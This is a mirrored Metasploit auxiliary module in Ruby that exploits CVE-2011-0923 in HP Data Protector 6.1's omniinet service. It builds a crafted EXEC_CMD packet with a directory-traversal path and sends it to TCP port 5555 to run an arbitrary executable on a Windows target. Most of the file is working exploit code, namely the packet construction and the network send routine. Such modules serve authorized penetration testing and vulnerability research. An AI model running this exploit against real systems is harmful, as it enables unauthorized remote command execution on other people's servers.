Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

hp_data_protector_cmd.rb 2.8KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. class MetasploitModule < Msf::Auxiliary
  6. include Msf::Exploit::Remote::Tcp
  7. def initialize(info = {})
  8. super(update_info(info,
  9. 'Name' => 'HP Data Protector 6.1 EXEC_CMD Command Execution',
  10. 'Description' => %q{
  11. This module exploits HP Data Protector's omniinet process, specifically
  12. against a Windows setup.
  13. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look
  14. for that user-supplied filename with kernel32!FindFirstFileW(). If the file
  15. is found, the process will then go ahead execute it with CreateProcess()
  16. under a new thread. If the filename isn't found, FindFirstFileW() will throw
  17. an error (0x03), and then bails early without triggering CreateProcess().
  18. Because of these behaviors, if you try to supply an argument, FindFirstFileW()
  19. will look at that as part of the filename, and then bail.
  20. Please note that when you specify the 'CMD' option, the base path begins
  21. under C:\.
  22. },
  23. 'References' =>
  24. [
  25. [ 'CVE', '2011-0923' ],
  26. [ 'OSVDB', '72526' ],
  27. [ 'ZDI', '11-055' ],
  28. [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
  29. ],
  30. 'Author' =>
  31. [
  32. 'ch0ks', # poc
  33. 'c4an', # msf poc (linux)
  34. 'wireghoul', # Improved msf (linux)
  35. 'sinn3r'
  36. ],
  37. 'License' => MSF_LICENSE,
  38. 'DisclosureDate' => "Feb 7 2011"
  39. ))
  40. register_options(
  41. [
  42. Opt::RPORT(5555),
  43. OptString.new("CMD", [true, 'File to execute', 'Windows\System32\calc.exe'])
  44. ])
  45. end
  46. def run
  47. cmd = datastore['CMD']
  48. cmd << "\x00"*25
  49. cmd << "\n"
  50. user = Rex::Text.rand_text_alpha(4)
  51. packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
  52. packet << user*2
  53. packet << "\x00\x20\x30\x00\x20"
  54. packet << "SYSTEM"
  55. packet << "\x00\x20\x63\x34\x61\x6e"
  56. packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
  57. packet << user
  58. packet << "\x20\x20\x20\x20\x00\x20"
  59. packet << "\x50\x6f\x63"
  60. packet << "\x00\x20"
  61. packet << "NTAUTHORITY"
  62. packet << "\x00\x20"
  63. packet << "NTAUTHORITY"
  64. packet << "\x00\x20"
  65. packet << "NTAUTHORITY"
  66. packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
  67. packet << "../../../../../../../../../../"
  68. packet << cmd
  69. begin
  70. print_status("#{rhost}:#{rport} - Sending command...")
  71. connect
  72. sock.put(packet)
  73. res = sock.get_once
  74. print_status(res.to_s) if res and not res.empty?
  75. rescue
  76. print_error("#{rhost}:#{rport} - Unable to connect")
  77. ensure
  78. disconnect
  79. end
  80. end
  81. end